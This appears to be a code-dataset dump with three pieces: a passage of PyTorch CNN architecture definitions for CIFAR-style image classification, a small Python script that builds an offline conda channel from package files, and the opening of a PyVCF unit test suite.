bottleneck = self.conv_expand.forward(bottleneck)
bottleneck = self.bn_expand.forward(bottleneck)
residual = self.shortcut.forward(x)
return F.relu(residual + bottleneck, inplace=True)
class CifarResNeXt(nn.Module):
"""
ResNext optimized for the Cifar dataset, as specified in
https://arxiv.org/pdf/1611.05431.pdf
"""
def __init__(self, cardinality, depth, nlabels, base_width, widen_factor=4):
""" Constructor
Args:
cardinality: number of convolution groups.
depth: number of layers.
nlabels: number of classes
base_width: base number of channels in each group.
widen_factor: factor to adjust the channel dimensionality
"""
super(CifarResNeXt, self).__init__()
self.cardinality = cardinality
self.depth = depth
self.block_depth = (self.depth - 2) // 9
self.base_width = base_width
self.widen_factor = widen_factor
self.nlabels = nlabels
self.output_size = 64
self.stages = [64, 64 * self.widen_factor, 128 * self.widen_factor, 256 * self.widen_factor]
self.conv_1_3x3 = nn.Conv2d(3, 64, 3, 1, 1, bias=False)
self.bn_1 = nn.BatchNorm2d(64)
self.stage_1 = self.block('stage_1', self.stages[0], self.stages[1], 1)
self.stage_2 = self.block('stage_2', self.stages[1], self.stages[2], 2)
self.stage_3 = self.block('stage_3', self.stages[2], self.stages[3], 2)
self.classifier = nn.Linear(self.stages[3], nlabels)
nn.init.kaiming_normal(self.classifier.weight)
for key in self.state_dict():
if key.split('.')[-1] == 'weight':
if 'conv' in key:
nn.init.kaiming_normal(self.state_dict()[key], mode='fan_out')
if 'bn' in key:
self.state_dict()[key][...] = 1
elif key.split('.')[-1] == 'bias':
self.state_dict()[key][...] = 0
def block(self, name, in_channels, out_channels, pool_stride=2):
""" Stack n bottleneck modules where n is inferred from the depth of the network.
Args:
name: string name of the current block.
in_channels: number of input channels
out_channels: number of output channels
pool_stride: factor to reduce the spatial dimensionality in the first bottleneck of the block.
Returns: a Module consisting of n sequential bottlenecks.
"""
block = nn.Sequential()
for bottleneck in range(self.block_depth):
name_ = '%s_bottleneck_%d' % (name, bottleneck)
if bottleneck == 0:
block.add_module(name_, ResNeXtBottleneck(in_channels,
out_channels,
pool_stride,
self.cardinality,
self.base_width,
self.widen_factor))
else:
block.add_module(name_,
ResNeXtBottleneck(out_channels, out_channels,
1, self.cardinality,
self.base_width,
self.widen_factor))
return block
def forward(self, x):
x = self.conv_1_3x3.forward(x)
x = F.relu(self.bn_1.forward(x), inplace=True)
x = self.stage_1.forward(x)
x = self.stage_2.forward(x)
x = self.stage_3.forward(x)
x = F.avg_pool2d(x, 8, 1)
x = x.view(-1, self.stages[3])
return self.classifier(x)
class Bottleneck(nn.Module):
'''Dual Path Networks in PyTorch.'''
def __init__(self, last_planes, in_planes, out_planes, dense_depth,
stride, first_layer):
super(Bottleneck, self).__init__()
self.out_planes = out_planes
self.dense_depth = dense_depth
self.conv1 = nn.Conv2d(last_planes, in_planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(in_planes)
self.conv2 = nn.Conv2d(in_planes, in_planes, kernel_size=3, stride=stride,
padding=1, groups=32, bias=False)
self.bn2 = nn.BatchNorm2d(in_planes)
self.conv3 = nn.Conv2d(in_planes, out_planes+dense_depth, kernel_size=1,
bias=False)
self.bn3 = nn.BatchNorm2d(out_planes+dense_depth)
self.shortcut = nn.Sequential()
if first_layer:
self.shortcut = nn.Sequential(
nn.Conv2d(last_planes, out_planes+dense_depth, kernel_size=1,
stride=stride, bias=False),
nn.BatchNorm2d(out_planes+dense_depth)
)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = F.relu(self.bn2(self.conv2(out)))
out = self.bn3(self.conv3(out))
x = self.shortcut(x)
d = self.out_planes
out = torch.cat([x[:, :d, :, :] + out[:, :d, :, :],
x[:, d:, :, :],
out[:, d:, :, :]], dim=1)
out = F.relu(out)
return out
class DPN(nn.Module):
def __init__(self, cfg):
super(DPN, self).__init__()
in_planes, out_planes = cfg['in_planes'], cfg['out_planes']
num_blocks, dense_depth = cfg['num_blocks'], cfg['dense_depth']
self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1,
bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.last_planes = 64
self.layer1 = self._make_layer(in_planes[0], out_planes[0],
num_blocks[0], dense_depth[0], stride=1)
self.layer2 = self._make_layer(in_planes[1], out_planes[1],
num_blocks[1], dense_depth[1], stride=2)
self.layer3 = self._make_layer(in_planes[2], out_planes[2],
num_blocks[2], dense_depth[2], stride=2)
self.layer4 = self._make_layer(in_planes[3], out_planes[3],
num_blocks[3], dense_depth[3], stride=2)
self.linear = nn.Linear(
out_planes[3] + (num_blocks[3] + 1) * dense_depth[3], 10)
def _make_layer(self, in_planes, out_planes, num_blocks, dense_depth, stride):
strides = [stride] + [1]*(num_blocks-1)
layers = []
for i,stride in enumerate(strides):
layers.append(Bottleneck(self.last_planes, in_planes,
out_planes, dense_depth, stride, i == 0))
self.last_planes = out_planes + (i+2) * dense_depth
return nn.Sequential(*layers)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.layer1(out)
out = self.layer2(out)
out = self.layer3(out)
out = self.layer4(out)
out = F.avg_pool2d(out, 4)
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
class LeNet(nn.Module):
def __init__(self, num_classes=10):
super(LeNet, self).__init__()
self.conv1 = nn.Conv2d(3, 6, kernel_size=5)
self.conv2 = nn.Conv2d(6, 16, kernel_size=5)
self.fc1 = nn.Linear(16*5*5, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, num_classes)
def forward(self, x):
x = F.relu(self.conv1(x))
x = F.max_pool2d(x, 2)
x = F.relu(self.conv2(x))
x = F.max_pool2d(x, 2)
x = x.view(x.size(0), -1)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
class AlexNet(nn.Module):
def __init__(self, num_classes=10):
super(AlexNet, self).__init__()
self.features = nn.Sequential(
nn.Conv2d(3, 64, kernel_size=5, stride=4, padding=2),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2),
nn.Conv2d(64, 192, kernel_size=3, padding=2),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2),
nn.Conv2d(192, 384, kernel_size=3, stride=2, padding=3),
nn.ReLU(inplace=True),
nn.Conv2d(384, 256, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(256, 256, kernel_size=3, padding=2),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=3, stride=2),
)
self.classifier = nn.Sequential(
nn.Dropout(),
nn.Linear(256 * 2 * 2, 4096),
nn.ReLU(inplace=True),
nn.Dropout(),
nn.Linear(4096, 4096),
nn.ReLU(inplace=True),
nn.Linear(4096, num_classes),
)
def forward(self, x):
x = self.features(x)
x = x.view(x.size(0), 256 * 2 * 2)
x = self.classifier(x)
return x
class Inception(nn.Module):
def __init__(self, in_planes, kernel_1_x, kernel_3_in, kernel_3_x,
kernel_5_in, kernel_5_x, pool_planes):
super(Inception, self).__init__()
# 1x1 conv branch
self.b1 = nn.Sequential(
nn.Conv2d(in_planes, kernel_1_x, kernel_size=1),
nn.BatchNorm2d(kernel_1_x),
nn.ReLU(True),
)
# 1x1 conv -> 3x3 conv branch
self.b2 = nn.Sequential(
nn.Conv2d(in_planes, kernel_3_in, kernel_size=1),
nn.BatchNorm2d(kernel_3_in),
nn.ReLU(True),
nn.Conv2d(kernel_3_in, kernel_3_x, kernel_size=3, padding=1),
nn.BatchNorm2d(kernel_3_x),
nn.ReLU(True),
)
# 1x1 conv -> 5x5 conv branch
self.b3 = nn.Sequential(
nn.Conv2d(in_planes, kernel_5_in, kernel_size=1),
nn.BatchNorm2d(kernel_5_in),
nn.ReLU(True),
nn.Conv2d(kernel_5_in, kernel_5_x, kernel_size=3, padding=1),
nn.BatchNorm2d(kernel_5_x),
nn.ReLU(True),
nn.Conv2d(kernel_5_x, kernel_5_x, kernel_size=3, padding=1),
nn.BatchNorm2d(kernel_5_x),
nn.ReLU(True),
)
# 3x3 pool -> 1x1 conv branch
self.b4 = nn.Sequential(
nn.MaxPool2d(3, stride=1, padding=1),
nn.Conv2d(in_planes, pool_planes, kernel_size=1),
nn.BatchNorm2d(pool_planes),
nn.ReLU(True),
)
def forward(self, x):
y1 = self.b1(x)
y2 = self.b2(x)
y3 = self.b3(x)
y4 = self.b4(x)
return torch.cat([y1, y2, y3, y4], 1)
class GoogLeNet(nn.Module):
def __init__(self, num_classes=10):
super(GoogLeNet, self).__init__()
self.pre_layers = nn.Sequential(
nn.Conv2d(3, 192, kernel_size=3, padding=1),
nn.BatchNorm2d(192),
nn.ReLU(True),
)
self.a3 = Inception(192, 64, 96, 128, 16, 32, 32)
self.b3 = Inception(256, 128, 128, 192, 32, 96, 64)
self.max_pool = nn.MaxPool2d(3, stride=2, padding=1)
self.a4 = Inception(480, 192, 96, 208, 16, 48, 64)
self.b4 = Inception(512, 160, 112, 224, 24, 64, 64)
self.c4 = Inception(512, 128, 128, 256, 24, 64, 64)
self.d4 = Inception(512, 112, 144, 288, 32, 64, 64)
self.e4 = Inception(528, 256, 160, 320, 32, 128, 128)
self.a5 = Inception(832, 256, 160, 320, 32, 128, 128)
self.b5 = Inception(832, 384, 192, 384, 48, 128, 128)
self.avgpool = nn.AvgPool2d(8, stride=1)
self.linear = nn.Linear(1024, num_classes)
def forward(self, x):
x = self.pre_layers(x)
x = self.a3(x)
x = self.b3(x)
x = self.max_pool(x)
x = self.a4(x)
x = self.b4(x)
x = self.c4(x)
x = self.d4(x)
x = self.e4(x)
x = self.max_pool(x)
x = self.a5(x)
x = self.b5(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
x = self.linear(x)
return x
class DenseBottleneck(nn.Module):
def __init__(self, in_planes, growth_rate):
super(DenseBottleneck, self).__init__()
self.bn1 = nn.BatchNorm2d(in_planes)
self.conv1 = nn.Conv2d(in_planes, 4 * growth_rate, kernel_size=1, bias=False)
self.bn2 = nn.BatchNorm2d(4 * growth_rate)
self.conv2 = nn.Conv2d(4 * growth_rate, growth_rate, kernel_size=3,
padding=1, bias=False)
def forward(self, x):
y = self.conv1(F.relu(self.bn1(x)))
y = self.conv2(F.relu(self.bn2(y)))
x = torch.cat([y, x], 1)
return x
class Transition(nn.Module):
def __init__(self, in_planes, out_planes):
super(Transition, self).__init__()
self.bn = nn.BatchNorm2d(in_planes)
self.conv = nn.Conv2d(in_planes, out_planes, kernel_size=1, bias=False)
def forward(self, x):
x = self.conv(F.relu(self.bn(x)))
x = F.avg_pool2d(x, 2)
return x
class DenseNet(nn.Module):
def __init__(self, block, num_block, growth_rate=12, reduction=0.5,
num_classes=10):
super(DenseNet, self).__init__()
self.growth_rate = growth_rate
num_planes = 2 * growth_rate
self.conv1 = nn.Conv2d(3, num_planes, kernel_size=3, padding=1, bias=False)
self.dense1 = self._make_dense_layers(block, num_planes, num_block[0])
num_planes += num_block[0] * growth_rate
out_planes = int(math.floor(num_planes * reduction))
self.trans1 = Transition(num_planes, out_planes)
num_planes = out_planes
self.dense2 = self._make_dense_layers(block, num_planes, num_block[1])
num_planes += num_block[1] * growth_rate
out_planes = int(math.floor(num_planes * reduction))
self.trans2 = Transition(num_planes, out_planes)
num_planes = out_planes
self.dense3 = self._make_dense_layers(block, num_planes, num_block[2])
num_planes += num_block[2] * growth_rate
out_planes = int(math.floor(num_planes * reduction))
self.trans3 = Transition(num_planes, out_planes)
num_planes = out_planes
self.dense4 = self._make_dense_layers(block, num_planes, num_block[3])
num_planes += num_block[3] * growth_rate
self.bn = nn.BatchNorm2d(num_planes)
self.linear = nn.Linear(num_planes, num_classes)
def _make_dense_layers(self, block, in_planes, num_block):
layers = []
for i in range(num_block):
layers.append(block(in_planes, self.growth_rate))
in_planes += self.growth_rate
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.trans1(self.dense1(x))
x = self.trans2(self.dense2(x))
x = self.trans3(self.dense3(x))
x = self.dense4(x)
x = F.avg_pool2d(F.relu(self.bn(x)), 4)
x = x.view(x.size(0), -1)
x = self.linear(x)
return x
def DenseNet121():
return DenseNet(DenseBottleneck, [6, 12, 24, 16], growth_rate=32)
def DenseNet169():
return DenseNet(DenseBottleneck, [6, 12, 32, 32], growth_rate=32)
def DenseNet201():
return DenseNet(DenseBottleneck, [6, 12, 48, 32], growth_rate=32)
def DenseNet161():
return DenseNet(DenseBottleneck, [6, 12, 36, 24], growth_rate=48)
def resnext29_cifar10():
return CifarResNeXt(cardinality=32, depth=4, nlabels=10,
base_width=29)
def densenet_cifar(num_classes=10):
return DenseNet(DenseBottleneck, [6, 12, 24, 16], growth_rate=12)
def DPN26():
cfg = {
'in_planes': (96, 192, 384, 768),
'out_planes': (256, 512, 1024, 2048),
'num_blocks': (2, 2, 2, 2),
'dense_depth': (16, 32, 24, 128)
}
return DPN(cfg)
def DPN92(num_classes=10):
cfg = {
'in_planes': (96, 192, 384, 768),
'out_planes': (256, 512, 1024, 2048),
'num_blocks': (3, 4, 20, 3),
'dense_depth': (16, 32, 24, 128)
}
return DPN(cfg)
def test():
net = DPN92()
x = torch.randn(1, 3, 32, 32)
y = net(x)
print(y)
# test()
| 12,199 | 42 | 976 |
147be1c987270e7071f33f0664b66e49c7c1a99d | 3,460 | py | Python | offline/channel.py | wrh-dev/conda-offline | 9f6088b1d14d90caf74a170e8448ca7c982a67ef | [
"MIT"
] | null | null | null | offline/channel.py | wrh-dev/conda-offline | 9f6088b1d14d90caf74a170e8448ca7c982a67ef | [
"MIT"
] | null | null | null | offline/channel.py | wrh-dev/conda-offline | 9f6088b1d14d90caf74a170e8448ca7c982a67ef | [
"MIT"
] | null | null | null | import argparse
import logging
import os
import platform
import shutil
import subprocess
logging.getLogger(__name__).addHandler(logging.NullHandler())
if __name__ == '__main__':
_main_cmdline()
| 37.204301 | 99 | 0.69711 | import argparse
import logging
import os
import platform
import shutil
import subprocess
logging.getLogger(__name__).addHandler(logging.NullHandler())
def iter_package_dir(path: str):
for filename in os.listdir(path):
if filename.endswith('.tar.bz2'):
yield filename
def copy_and_index_files(packages_path: str, channel_path: str, is_64_bit: bool):
if is_64_bit and platform.system() == 'Windows':
arch_sub_folder = 'win-64'
elif not is_64_bit and platform.system() == 'Windows':
arch_sub_folder = 'win-32'
elif is_64_bit and platform.system() == 'Linux':
arch_sub_folder = 'linux-64'
elif not is_64_bit and platform.system() == 'Linux':
arch_sub_folder = 'linux-32'
elif is_64_bit and platform.system() == 'Darwin':
arch_sub_folder = 'osx-64'
else:
err_string = 'Unrecognized or incompatible architecture for conda'
logging.error(err_string)
raise ValueError(err_string)
logging.debug('Detected architecture as {0:s}'.format(arch_sub_folder))
arch_folder = os.path.join(channel_path, arch_sub_folder)
os.makedirs(arch_folder)
logging.info('Copying packages from {0:s} to {1:s}'.format(packages_path, arch_folder))
for package_file in iter_package_dir(packages_path):
copied_name = shutil.copy(os.path.join(packages_path, package_file), arch_folder)
logging.debug('Finished copying package to {0:s}'.format(copied_name))
subprocess.run(['conda', 'index', channel_path])
def create_offline_channel(packages_path: str, channel_path: str, is_64_bit: bool):
# 1. Create the channel directory if it does not exist
if os.path.exists(channel_path):
if os.listdir(channel_path):
err_string = 'The channel path must be an empty or non-existent folder'
logging.error(err_string)
raise ValueError(err_string)
else:
logging.debug('Creating channel path directory {0:s}'.format(channel_path))
os.makedirs(channel_path)
# 2. Copy the packages to the channel path and index the packages
copy_and_index_files(packages_path, channel_path, is_64_bit)
logging.info('Done creating channel')
def _argparse_packages_folder(filename: str):
if not os.path.exists(filename):
raise argparse.ArgumentTypeError('Package path {0:s} does not exist'.format(filename))
return os.path.realpath(filename)
def _argparse_channel_folder(filename: str):
if os.path.exists(filename):
if os.listdir(filename):
raise argparse.ArgumentTypeError(
'Channel path {0:s} must be an empty or non-existent folder'.format(filename))
return os.path.realpath(filename)
def _main_cmdline():
logging.basicConfig(level=logging.DEBUG)
parser = argparse.ArgumentParser(description='Create an offline channel from a package folder')
parser.add_argument('packages_folder', type=_argparse_packages_folder,
help='file path to packages folder')
parser.add_argument('channel_folder', type=_argparse_channel_folder,
help='file path to channel folder')
parser.add_argument('--arch', choices={32, 64}, default=64,
help='architecture (default to 64)')
args = parser.parse_args()
create_offline_channel(args.packages_folder, args.channel_folder, args.arch == 64)
if __name__ == '__main__':
_main_cmdline()
| 3,114 | 0 | 138 |
c3a2e2f54e8af90178fcb6c54fa3c64f500167cd | 32,123 | py | Python | vcf/test/test_vcf.py | jdiez/PyVCF | cd30d62e6fa3c9a44ed711adf0d22af3a4e4a5a1 | [
"MIT"
] | 1 | 2015-11-23T01:23:00.000Z | 2015-11-23T01:23:00.000Z | vcf/test/test_vcf.py | jdiez/PyVCF | cd30d62e6fa3c9a44ed711adf0d22af3a4e4a5a1 | [
"MIT"
] | null | null | null | vcf/test/test_vcf.py | jdiez/PyVCF | cd30d62e6fa3c9a44ed711adf0d22af3a4e4a5a1 | [
"MIT"
] | null | null | null | from __future__ import print_function
import unittest
import doctest
import os
import commands
import cPickle
from StringIO import StringIO
import vcf
from vcf import utils
suite = doctest.DocTestSuite(vcf)
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestGatkOutput))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestFreebayesOutput))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestSamtoolsOutput))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestBcfToolsOutput))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestGatkOutputWriter))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestBcfToolsOutputWriter))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestWriterDictionaryMeta))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestTabix))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestOpenMethods))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestFilter))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(Test1kg))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(Test1kgSites))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestGoNL))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestSamplesSpace))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestMixedFiltering))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestRecord))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestCall))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestRegression))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestVcfSpecs))
| 34.429796 | 176 | 0.559225 | from __future__ import print_function
import unittest
import doctest
import os
import commands
import cPickle
from StringIO import StringIO
import vcf
from vcf import utils
suite = doctest.DocTestSuite(vcf)
def fh(fname, mode='rt'):
return open(os.path.join(os.path.dirname(__file__), fname), mode)
class TestVcfSpecs(unittest.TestCase):
def test_vcf_4_0(self):
reader = vcf.Reader(fh('example-4.0.vcf'))
assert reader.metadata['fileformat'] == 'VCFv4.0'
# test we can walk the file at least
for r in reader:
if r.POS == 1230237:
assert r.is_monomorphic
else:
assert not r.is_monomorphic
if 'AF' in r.INFO:
self.assertEqual(type(r.INFO['AF']), type([]))
for c in r:
assert c
# issue 19, in the example ref the GQ is length 1
if c.called:
self.assertEqual(type(c.data.GQ), type(1))
if 'HQ' in c.data and c.data.HQ is not None:
self.assertEqual(type(c.data.HQ), type([]))
def test_vcf_4_1(self):
reader = vcf.Reader(fh('example-4.1.vcf'))
self.assertEqual(reader.metadata['fileformat'], 'VCFv4.1')
# contigs were added in vcf4.1
self.assertEqual(reader.contigs['20'].length, 62435964)
# test we can walk the file at least
for r in reader:
for c in r:
assert c
def test_vcf_4_1_sv(self):
reader = vcf.Reader(fh('example-4.1-sv.vcf'))
assert 'SVLEN' in reader.infos
assert 'fileDate' in reader.metadata
assert 'DEL' in reader.alts
# test we can walk the file at least
for r in reader:
print(r)
for a in r.ALT:
print(a)
for c in r:
print(c)
assert c
def test_vcf_4_1_bnd(self):
reader = vcf.Reader(fh('example-4.1-bnd.vcf'))
# test we can walk the file at least
for r in reader:
print(r)
for a in r.ALT:
print(a)
if r.ID == "bnd1":
assert len(r.ALT) == 1
assert r.ALT[0].type == "BND"
assert r.ALT[0].chr == "2"
assert r.ALT[0].pos == 3
assert r.ALT[0].orientation == False
assert r.ALT[0].remoteOrientation == True
assert r.ALT[0].connectingSequence == "T"
if r.ID == "bnd4":
assert len(r.ALT) == 1
assert r.ALT[0].type == "BND"
assert r.ALT[0].chr == "1"
assert r.ALT[0].pos == 2
assert r.ALT[0].orientation == True
assert r.ALT[0].remoteOrientation == False
assert r.ALT[0].connectingSequence == "G"
for c in r:
print(c)
assert c
class TestGatkOutput(unittest.TestCase):
filename = 'gatk.vcf'
samples = ['BLANK', 'NA12878', 'NA12891', 'NA12892',
'NA19238', 'NA19239', 'NA19240']
formats = ['AD', 'DP', 'GQ', 'GT', 'PL']
infos = ['AC', 'AF', 'AN', 'BaseQRankSum', 'DB', 'DP', 'DS',
'Dels', 'FS', 'HRun', 'HaplotypeScore', 'InbreedingCoeff',
'MQ', 'MQ0', 'MQRankSum', 'QD', 'ReadPosRankSum']
n_calls = 37
def setUp(self):
self.reader = vcf.Reader(fh(self.filename))
def testSamples(self):
self.assertEqual(self.reader.samples, self.samples)
def testFormats(self):
self.assertEqual(set(self.reader.formats), set(self.formats))
def testInfos(self):
self.assertEqual(set(self.reader.infos), set(self.infos))
def testCalls(self):
n = 0
for site in self.reader:
n += 1
self.assertEqual(len(site.samples), len(self.samples))
# check sample name lookup
for s in self.samples:
assert site.genotype(s)
# check ordered access
self.assertEqual([x.sample for x in site.samples], self.samples)
self.assertEqual(n, self.n_calls)
class TestFreebayesOutput(TestGatkOutput):
filename = 'freebayes.vcf'
formats = ['AO', 'DP', 'GL', 'GLE', 'GQ', 'GT', 'QA', 'QR', 'RO']
infos = ['AB', 'ABP', 'AC', 'AF', 'AN', 'AO', 'BVAR', 'CIGAR',
'DB', 'DP', 'DPRA', 'EPP', 'EPPR', 'HWE', 'LEN', 'MEANALT',
'NUMALT', 'RPP', 'MQMR', 'ODDS', 'MQM', 'PAIREDR', 'PAIRED',
'SAP', 'XRM', 'RO', 'REPEAT', 'XRI', 'XAS', 'XAI', 'SRP',
'XAM', 'XRS', 'RPPR', 'NS', 'RUN', 'CpG', 'TYPE']
n_calls = 104
def testParse(self):
reader = vcf.Reader(fh('freebayes.vcf'))
print(reader.samples)
self.assertEqual(len(reader.samples), 7)
n = 0
for r in reader:
n+=1
for x in r:
assert x
assert n == self.n_calls
class TestSamtoolsOutput(unittest.TestCase):
def testParse(self):
reader = vcf.Reader(fh('samtools.vcf'))
self.assertEqual(len(reader.samples), 1)
self.assertEqual(sum(1 for _ in reader), 11)
class TestBcfToolsOutput(unittest.TestCase):
def testParse(self):
reader = vcf.Reader(fh('bcftools.vcf'))
self.assertEqual(len(reader.samples), 1)
for r in reader:
for s in r.samples:
s.phased
class Test1kg(unittest.TestCase):
def testParse(self):
reader = vcf.Reader(fh('1kg.vcf.gz', 'rb'))
assert 'FORMAT' in reader._column_headers
self.assertEqual(len(reader.samples), 629)
for _ in reader:
pass
def test_issue_49(self):
"""docstring for test_issue_49"""
reader = vcf.Reader(fh('issue_49.vcf', 'r'))
self.assertEqual(len(reader.samples), 0)
for _ in reader:
pass
class Test1kgSites(unittest.TestCase):
def test_reader(self):
"""The samples attribute should be the empty list."""
reader = vcf.Reader(fh('1kg.sites.vcf', 'r'))
assert 'FORMAT' not in reader._column_headers
self.assertEqual(reader.samples, [])
for record in reader:
self.assertEqual(record.samples, [])
def test_writer(self):
"""FORMAT should not be written if not present in the template and no
extra tab character should be printed if there are no FORMAT fields."""
reader = vcf.Reader(fh('1kg.sites.vcf', 'r'))
out = StringIO()
writer = vcf.Writer(out, reader, lineterminator='\n')
for record in reader:
writer.write_record(record)
out.seek(0)
out_str = out.getvalue()
for line in out_str.split('\n'):
if line.startswith('##'):
continue
if line.startswith('#CHROM'):
assert 'FORMAT' not in line
assert not line.endswith('\t')
class TestGoNL(unittest.TestCase):
def testParse(self):
reader = vcf.Reader(fh('gonl.chr20.release4.gtc.vcf'))
for _ in reader:
pass
def test_contig_line(self):
reader = vcf.Reader(fh('gonl.chr20.release4.gtc.vcf'))
self.assertEqual(reader.contigs['1'].length, 249250621)
class TestGatkOutputWriter(unittest.TestCase):
def testWrite(self):
reader = vcf.Reader(fh('gatk.vcf'))
out = StringIO()
writer = vcf.Writer(out, reader)
records = list(reader)
for record in records:
writer.write_record(record)
out.seek(0)
out_str = out.getvalue()
for line in out_str.split("\n"):
if line.startswith("##contig"):
assert line.startswith('##contig=<'), "Found dictionary in contig line: {0}".format(line)
print (out_str)
reader2 = vcf.Reader(out)
self.assertEquals(reader.samples, reader2.samples)
self.assertEquals(reader.formats, reader2.formats)
self.assertEquals(reader.infos, reader2.infos)
for l, r in zip(records, reader2):
self.assertEquals(l.samples, r.samples)
# test for call data equality, since equality on the sample calls
# may not always mean their data are all equal
for l_call, r_call in zip(l.samples, r.samples):
self.assertEqual(l_call.data, r_call.data)
class TestBcfToolsOutputWriter(unittest.TestCase):
def testWrite(self):
reader = vcf.Reader(fh('bcftools.vcf'))
out = StringIO()
writer = vcf.Writer(out, reader)
records = list(reader)
for record in records:
writer.write_record(record)
out.seek(0)
print (out.getvalue())
reader2 = vcf.Reader(out)
self.assertEquals(reader.samples, reader2.samples)
self.assertEquals(reader.formats, reader2.formats)
self.assertEquals(reader.infos, reader2.infos)
for l, r in zip(records, reader2):
self.assertEquals(l.samples, r.samples)
# test for call data equality, since equality on the sample calls
# may not always mean their data are all equal
for l_call, r_call in zip(l.samples, r.samples):
self.assertEqual(l_call.data, r_call.data)
class TestWriterDictionaryMeta(unittest.TestCase):
def testWrite(self):
reader = vcf.Reader(fh('example-4.1-bnd.vcf'))
out = StringIO()
writer = vcf.Writer(out, reader)
records = list(reader)
for record in records:
writer.write_record(record)
out.seek(0)
out_str = out.getvalue()
for line in out_str.split("\n"):
if line.startswith("##PEDIGREE"):
self.assertEquals(line, '##PEDIGREE=<Derived="Tumor",Original="Germline">')
if line.startswith("##SAMPLE"):
assert line.startswith('##SAMPLE=<'), "Found dictionary in meta line: {0}".format(line)
class TestSamplesSpace(unittest.TestCase):
filename = 'samples-space.vcf'
samples = ['NA 00001', 'NA 00002', 'NA 00003']
def test_samples(self):
self.reader = vcf.Reader(fh(self.filename), strict_whitespace=True)
self.assertEqual(self.reader.samples, self.samples)
class TestMixedFiltering(unittest.TestCase):
filename = 'mixed-filtering.vcf'
def test_mixed_filtering(self):
"""
Test mix of FILTER values (pass, filtered, no filtering).
"""
reader = vcf.Reader(fh(self.filename))
self.assertEqual(next(reader).FILTER, [])
self.assertEqual(next(reader).FILTER, ['q10'])
self.assertEqual(next(reader).FILTER, [])
self.assertEqual(next(reader).FILTER, None)
self.assertEqual(next(reader).FILTER, ['q10', 'q50'])
class TestRecord(unittest.TestCase):
def test_num_calls(self):
reader = vcf.Reader(fh('example-4.0.vcf'))
for var in reader:
num_calls = (var.num_hom_ref + var.num_hom_alt + \
var.num_het + var.num_unknown)
self.assertEqual(len(var.samples), num_calls)
def test_call_rate(self):
reader = vcf.Reader(fh('example-4.0.vcf'))
for var in reader:
call_rate = var.call_rate
if var.POS == 14370:
self.assertEqual(3.0/3.0, call_rate)
if var.POS == 17330:
self.assertEqual(3.0/3.0, call_rate)
if var.POS == 1110696:
self.assertEqual(3.0/3.0, call_rate)
if var.POS == 1230237:
self.assertEqual(3.0/3.0, call_rate)
elif var.POS == 1234567:
self.assertEqual(2.0/3.0, call_rate)
def test_aaf(self):
reader = vcf.Reader(fh('example-4.0.vcf'))
for var in reader:
aaf = var.aaf
if var.POS == 14370:
self.assertEqual(3.0/6.0, aaf)
if var.POS == 17330:
self.assertEqual(1.0/6.0, aaf)
if var.POS == 1110696:
self.assertEqual(None, aaf)
if var.POS == 1230237:
self.assertEqual(0.0/6.0, aaf)
elif var.POS == 1234567:
self.assertEqual(None, aaf)
def test_pi(self):
reader = vcf.Reader(fh('example-4.0.vcf'))
for var in reader:
pi = var.nucl_diversity
if var.POS == 14370:
self.assertEqual(6.0/10.0, pi)
if var.POS == 17330:
self.assertEqual(1.0/3.0, pi)
if var.POS == 1110696:
self.assertEqual(None, pi)
if var.POS == 1230237:
self.assertEqual(0.0/6.0, pi)
elif var.POS == 1234567:
self.assertEqual(None, pi)
def test_is_snp(self):
reader = vcf.Reader(fh('example-4.0.vcf'))
for r in reader:
print(r)
for c in r:
print(c)
assert c
for var in reader:
is_snp = var.is_snp
if var.POS == 14370:
self.assertEqual(True, is_snp)
if var.POS == 17330:
self.assertEqual(True, is_snp)
if var.POS == 1110696:
self.assertEqual(True, is_snp)
if var.POS == 1230237:
self.assertEqual(False, is_snp)
elif var.POS == 1234567:
self.assertEqual(False, is_snp)
def test_is_indel(self):
reader = vcf.Reader(fh('example-4.0.vcf'))
for var in reader:
is_indel = var.is_indel
if var.POS == 14370:
self.assertEqual(False, is_indel)
if var.POS == 17330:
self.assertEqual(False, is_indel)
if var.POS == 1110696:
self.assertEqual(False, is_indel)
if var.POS == 1230237:
self.assertEqual(True, is_indel)
elif var.POS == 1234567:
self.assertEqual(True, is_indel)
def test_is_transition(self):
reader = vcf.Reader(fh('example-4.0.vcf'))
for var in reader:
is_trans = var.is_transition
if var.POS == 14370:
self.assertEqual(True, is_trans)
if var.POS == 17330:
self.assertEqual(False, is_trans)
if var.POS == 1110696:
self.assertEqual(False, is_trans)
if var.POS == 1230237:
self.assertEqual(False, is_trans)
elif var.POS == 1234567:
self.assertEqual(False, is_trans)
def test_is_deletion(self):
